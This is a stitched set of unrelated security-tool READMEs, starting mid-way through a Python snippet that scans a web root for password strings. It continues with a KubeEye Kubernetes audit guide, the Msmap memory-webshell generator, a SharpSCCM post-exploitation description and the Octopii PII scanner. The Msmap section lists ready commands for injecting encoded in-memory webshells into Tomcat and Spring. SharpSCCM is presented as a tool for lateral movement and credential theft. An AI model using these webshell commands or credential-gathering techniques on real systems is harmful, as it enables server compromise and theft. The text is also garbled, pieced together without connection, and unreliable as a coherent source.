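        if not path.is_file() or path.suffix.lstrip(".").lower() in FILETYPE_BLACKLIST:
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable file: skip, like a permissions error in tree
        hits = sorted(set(rx.findall(text)))  # unique list of matched patterns
        if hits:
            yield path, hits
```

Running it with the example regex against a web root would surface files containing password-assignment strings, which is what the -i option then restricts the tree output to.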
KubeEye is an inspection tool for Kubernetes that checks whether Kubernetes resources (via OPA), cluster components, cluster nodes (via Node-Problem-Detector) and other configurations meet best practices, and gives suggestions for modification.
KubeEye supports custom inspection rules and plugin installation. Through KubeEye Operator, you can view the inspection results and modification suggestions graphically on a web page.
KubeEye gets cluster resource details through the Kubernetes API, inspects the resource configurations against inspection rules and plugins, and generates inspection results. See Architecture for details.
Install KubeEye on your machine
Download pre built executables from Releases.
Or you can build from source code
Note: make install will create kubeeye in /usr/local/bin/ on your machine.
git clone https://github.com/kubesphere/kubeeye.git
cd kubeeye
make installke
[Optional] Install Node-problem-Detector
Note: This will install npd on your cluster; it is only required if you want a detailed report.
kubeeye install npd
Note: The results of kubeeye are sorted by resource kind.
kubeeye audit
KIND NAMESPACE NAME REASON LEVEL MESSAGE
Node docker-desktop kubelet has no sufficient memory available warning KubeletHasNoSufficientMemory
Node docker-desktop kubelet has no sufficient PID available warning KubeletHasNoSufficientPID
Node docker-desktop kubelet has disk pressure warning KubeletHasDiskPressure
Deployment default testkubeeye NoCPULimits
Deployment default testkubeeye NoReadinessProbe
Deployment default testkubeeye NotRunAsNonRoot
Deployment kube-system coredns NoCPULimits
Deployment kube-system coredns ImagePullPolicyNotAlways
Deployment kube-system coredns NotRunAsNonRoot
Deployment kubeeye-system kubeeye-controller-manager ImagePullPolicyNotAlways
Deployment kubeeye-system kubeeye-controller-manager NotRunAsNonRoot
DaemonSet kube-system kube-proxy NoCPULimits
DaemonSet kube-system kube-proxy NotRunAsNonRoot
Event kube-system coredns-558bd4d5db-c26j8.16d5fa3ddf56675f Unhealthy warning Readiness probe failed: Get "http://10.1.0.87:8181/ready": dial tcp 10.1.0.87:8181: connect: connection refused
Event kube-system coredns-558bd4d5db-c26j8.16d5fa3fbdc834c9 Unhealthy warning Readiness probe failed: HTTP probe failed with statuscode: 503
Event kube-system vpnkit-controller.16d5ac2b2b4fa1eb BackOff warning Back-off restarting failed container
Event kube-system vpnkit-controller.16d5fa44d0502641 BackOff warning Back-off restarting failed container
Event kubeeye-system kubeeye-controller-manager-7f79c4ccc8-f2njw.16d5fa3f5fc3229c Failed warning Failed to pull image "controller:latest": rpc error: code = Unknown desc = Error response from daemon: pull access denied for controller, repository does not exist or may require 'docker login': denied: requested access to the resource is denied
Event kubeeye-system kubeeye-controller-manager-7f79c4ccc8-f2njw.16d5fa3f61b28527 Failed warning Error: ImagePullBackOff
Role kubeeye-system kubeeye-leader-election-role CanDeleteResources
ClusterRole kubeeye-manager-role CanDeleteResources
ClusterRole kubeeye-manager-role CanModifyWorkloads
ClusterRole vpnkit-controller CanImpersonateUser
ClusterRole vpnkit-controller CanDeleteResources
YES/NO | CHECK ITEM | Description | Level |
---|---|---|---|
✅ | PrivilegeEscalationAllowed | Privilege escalation is allowed | danger |
✅ | CanImpersonateUser | The role/clusterrole can impersonate other users | warning |
✅ | CanModifyResources | The role/clusterrole can modify kubernetes resources | warning |
✅ | CanModifyWorkloads | The role/clusterrole can modify kubernetes workloads | warning |
✅ | NoCPULimits | The resource does not set CPU limits in containers.resources | danger |
✅ | NoCPURequests | The resource does not set CPU requests in containers.resources | danger |
✅ | HighRiskCapabilities | Has high-risk options in capabilities, such as ALL/SYS_ADMIN/NET_ADMIN | danger |
✅ | HostIPCAllowed | HostIPC set to true | danger |
✅ | HostNetworkAllowed | HostNetwork set to true | danger |
✅ | HostPIDAllowed | HostPID set to true | danger |
✅ | HostPortAllowed | HostPort set to true | danger |
✅ | ImagePullPolicyNotAlways | Image pull policy is not Always | warning |
✅ | ImageTagIsLatest | The image tag is latest | warning |
✅ | ImageTagMiss | No image tag is declared | danger |
✅ | InsecureCapabilities | Has insecure options in capabilities, such as KILL/SYS_CHROOT/CHOWN | danger |
✅ | NoLivenessProbe | The resource does not set livenessProbe | warning |
✅ | NoMemoryLimits | The resource does not set memory limits in containers.resources | danger |
✅ | NoMemoryRequests | The resource does not set memory requests in containers.resources | danger |
✅ | NoPriorityClassName | The resource does not set priorityClassName | ignore |
✅ | PrivilegedAllowed | Running a pod in privileged mode means the pod can access the host's resources and kernel capabilities | danger |
✅ | NoReadinessProbe | The resource does not set readinessProbe | warning |
✅ | NotReadOnlyRootFilesystem | The resource does not set readOnlyRootFilesystem to true | warning |
✅ | NotRunAsNonRoot | The resource does not set runAsNonRoot to true and may run as root | warning |
✅ | CertificateExpiredPeriod | Certificate expiration date is less than 30 days away | danger |
✅ | EventAudit | Event audit | warning |
✅ | NodeStatus | Node status audit | warning |
✅ | DockerStatus | Docker status audit | warning |
✅ | KubeletStatus | Kubelet status audit | warning |
mkdir opa
Note: For OPA rules for workloads, the package name must be kubeeye_workloads_rego; for RBAC, the package name must be kubeeye_RBAC_rego; for nodes, the package name must be kubeeye_nodes_rego.
package kubeeye_workloads_rego
deny[msg] {
resource := input
type := resource.Object.kind
resourcename := resource.Object.metadata.name
resourcenamespace := resource.Object.metadata.namespace
workloadsType := {"Deployment","ReplicaSet","DaemonSet","StatefulSet","Job"}
workloadsType[type]
not workloadsImageRegistryRule(resource)
msg := {
"Name": sprintf("%v", [resourcename]),
"Namespace": sprintf("%v", [resourcenamespace]),
"Type": sprintf("%v", [type]),
"Message": "ImageRegistryNotmyregistry"
}
}
workloadsImageRegistryRule(resource) {
regex.match("^myregistry.public.kubesphere/basic/.+", resource.Object.spec.template.spec.containers[_].image)
}
Note: Specify the path, and KubeEye will read all files in the directory that end with .rego.
root:# kubeeye audit -p ./opa
NAMESPACE NAME KIND MESSAGE
default nginx1 Deployment [ImageRegistryNotmyregistry NotReadOnlyRootFilesystem NotRunAsNonRoot]
default nginx11 Deployment [ImageRegistryNotmyregistry PrivilegeEscalationAllowed HighRiskCapabilities HostIPCAllowed HostPortAllowed ImagePullPolicyNotAlways ImageTagIsLatest InsecureCapabilities NoPriorityClassName PrivilegedAllowed NotReadOnlyRootFilesystem NotRunAsNonRoot]
default nginx111 Deployment [ImageRegistryNotmyregistry NoCPULimits NoCPURequests ImageTagMiss NoLivenessProbe NoMemoryLimits NoMemoryRequests NoPriorityClassName NotReadOnlyRootFilesystem NoReadinessProbe NotRunAsNonRoot]
kubectl edit ConfigMap node-problem-detector-config -n kube-system
kubectl rollout restart DaemonSet node-problem-detector -n kube-system
KubeEye Operator is an inspection platform for Kubernetes that manages KubeEye through an operator and generates inspection results.
kubectl apply -f https://raw.githubusercontent.com/kubesphere/kubeeye/main/deploy/kubeeye.yaml
kubectl apply -f https://raw.githubusercontent.com/kubesphere/kubeeye/main/deploy/kubeeye_insights.yaml
kubectl get clusterinsight -o yaml
apiVersion: v1
items:
- apiVersion: kubeeye.kubesphere.io/v1alpha1
kind: ClusterInsight
metadata:
name: clusterinsight-sample
namespace: default
spec:
auditPeriod: 24h
status:
auditResults:
auditResults:
- resourcesType: Node
resultInfos:
- namespace: ""
resourceInfos:
- items:
- level: warning
message: KubeletHasNoSufficientMemory
reason: kubelet has no sufficient memory available
- level: warning
message: KubeletHasNoSufficientPID
reason: kubelet has no sufficient PID available
- level: warning
message: KubeletHasDiskPressure
reason: kubelet has disk pressure
name: kubeeyeNode
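The nested status block above can be flattened into simple tuples when consumed programmatically; a sketch over the plain dict you would get from kubectl get clusterinsight -o json (the helper name is ours, not part of KubeEye):

```python
def flatten_audit(status: dict):
    """Flatten a ClusterInsight status.auditResults block into
    (kind, resource name, level, message) tuples."""
    rows = []
    # The status block nests auditResults twice, as in the YAML above
    for audit in status.get("auditResults", {}).get("auditResults", []):
        kind = audit.get("resourcesType", "")
        for info in audit.get("resultInfos", []):
            for res in info.get("resourceInfos", []):
                name = res.get("name", "")
                for item in res.get("items", []):
                    rows.append((kind, name, item.get("level"), item.get("message")))
    return rows
```

With the sample status above, this yields one warning tuple per kubelet condition on the kubeeyeNode resource.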
Msmap is a Memory WebShell Generator. Compatible with various Containers, Components, Encoders, WebShell / Proxy / Killer and Management Clients. Simplified Chinese
The idea behind I, The idea behind II
*: Default support for Linux Tomcat 8/9; more versions can be adapted according to the advanced guide.
WebShell
No need for modularity
Proxy: Neo-reGeorg, wsproxy
Killer: java-memshell-scanner, ASP.NET-Memshell-Scanner
git clone git@github.com:hosch3n/msmap.git
cd msmap
python generator.py
[Warning] You MUST set a unique password; options are case-sensitive.
Edit config/environment.py
# Auto Compile
auto_build = True
# Base64 Encode Class File
b64_class = True
# Generate Script File
generate_script = True
# Compiler Absolute Path
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
Edit gist/java/container/tomcat/servlet.py
// Servlet Path Pattern
private static String pattern = "*.xml";
If an encryption encoder is used in WsFilter, the password needs to be the same as the path (e.g. /passwd).
gist/java/container/jdk/javax.py with lib/servlet-api.jar can be replaced depending on the target container.
Run pip3 install pyperclip to support automatic copying to the clipboard.
Command with Base64 Encoder | Inject Tomcat Valve
python generator.py Java Tomcat Valve Base64 CMD passwd
Type JSP with default Encoder | Inject Tomcat Valve
python generator.py Java Tomcat Valve RAW AntSword passwd
Type JSP with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat Listener
python generator.py Java Tomcat Listener AES128 AntSword passwd
Type JSP with rc_4_sha256 Encoder | Inject Tomcat Servlet
python generator.py Java Tomcat Servlet RC4 AntSword passwd
Type JSP with xor_md5 Encoder | AgentFiless Inject HttpServlet
python generator.py Java JDK JavaX XOR AntSword passwd
Type JSPJS with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat WsFilter
python generator.py Java Tomcat WsFilter AES128 JSPJS passwd
Type default_aes | Inject Tomcat Valve
python generator.py Java Tomcat Valve AES128 Behinder rebeyond
Type default_xor_base64 | Inject Spring Interceptor
python generator.py Java Spring Interceptor XOR Behinder rebeyond
Type JAVA_AES_BASE64 | Inject Tomcat Valve
python generator.py Java Tomcat Valve AES128 Godzilla superidol
Type JAVA_AES_BASE64 | AgentFiless Inject HttpServlet
python generator.py Java JDK JavaX AES128 Godzilla superidol
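As an illustration of what an xor_md5-style encoder in the commands above does conceptually, here is a generic sketch (not Msmap's actual implementation): derive a repeating key from the MD5 of the password and XOR the payload with it.

```python
import hashlib

def xor_md5_encode(data: bytes, password: str) -> bytes:
    """XOR the payload with a repeating key derived from MD5(password).
    Generic illustration of an xor_md5-style traffic encoder; Msmap's
    real scheme may differ in key derivation and framing."""
    key = hashlib.md5(password.encode()).hexdigest().encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
```

Because XOR is symmetric, the same function both encodes and decodes, which is why client and server only need to share the password.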
Behinder | wsMemShell | ysomap
SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr, formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI.
SharpSCCM was initially created to execute user hunting and lateral movement functions ported from PowerSCCM (by @harmj0y, @jaredcatkinson, @enigma0x3, and @mattifestation) and now contains additional functionality to gather credentials and abuse newly discovered attack primitives for coercing NTLM authentication in SCCM sites where automatic site-wide client push installation is enabled.
Please visit the wiki for documentation detailing how to build and use SharpSCCM.
Chris Thompson is the primary author of this project. Duane Michael (@subat0mik) and Evan McBroom (@mcbroom_evan) are active contributors as well. Please feel free to reach out on Twitter (@_Mayyhem) with questions, ideas for improvements, etc., and on GitHub with issues and pull requests.
This tool was written as a proof of concept in a lab environment and has not been thoroughly tested. There are lots of unfinished bits, terrible error handling, and functions I may never complete. Please be careful and use at your own risk.
Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.
Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:
The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.
A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:
Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.
Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.
Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.
Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.
As a final verification method, images are scanned for certain strings to verify the accuracy of the model.
The accuracy of the scan can be determined via the confidence scores in the output. If all the mentioned conditions are met, a score of 100.0 is returned.
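The outcome tiers described above boil down to combining the classifier confidence with the OCR keyword check; a simplified sketch (thresholds taken from the text, function name ours, not Octopii's actual code):

```python
def classify_result(classifier_score: float, ocr_hits: int) -> str:
    """Map a classifier confidence (0-100) and the number of OCR keyword
    matches onto the outcome tiers described above. Thresholds mirror the
    documentation; Octopii's real scoring logic may differ."""
    if classifier_score >= 90 and ocr_hits > 0:
        return "best"       # classifier and OCR agree: extremely reliable
    if classifier_score >= 50 and ocr_hits > 0:
        return "average"    # OCR evidence can reclassify a partial match
    if ocr_hits == 0:
        return "worst"      # classifier-only result, no OCR confirmation
    return "incorrect"      # low score plus stray OCR hits: likely false positive
```

The key point is that a high classifier score alone is not trusted; the OCR substring check acts as the final verification described above.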
To train the model, data can also be fed into the model_generator.py
script, and the newly improved h5 file can be used.
pip install -r requirements.txt
sudo apt install tesseract-ocr -y (for Ubuntu/Debian)
Run python3 octopii.py <location name>, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>
Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.
Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:
Fork the official repository at https://github.com/redhuntlabs/octopii
There are 3 files in the models/ directory:
- The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python.
- The labels.txt file contains the list of labels corresponding to the index that the model returns.
- The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.
Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:
Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.
Note: Only upload images that match the class name; for example, the German Passport class must contain only German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.
Place the keras_model.h5 and labels.txt files into the models/ directory in Octopii. The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII; make sure they are square-ish in image size.
Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:
- Open the ocr_list.json file and create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
- Under keywords, use as many unique terms from your asset as possible, such as "Income Tax Department", and store them in a JSONArray.
- Save the ocr_list.json file.
You can replace each file you modify in the models/ directory after you create or edit them via the above methods.
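Put together, a hypothetical ocr_list.json entry might look like the following (the class name and keywords are illustrative placeholders only; the real file also carries extra metadata such as country of origin and regular expressions):

```json
{
    "German Passport": {
        "keywords": ["Reisepass", "Bundesrepublik Deutschland"]
    }
}
```

The top-level key must match the Teachable Machine class name exactly, as noted above.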
Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.
Note: Please take the following steps to ensure the quality of ocr_list.json.
(c) Copyright 2022 RedHunt Labs Private Limited
Author: Owais Shaikh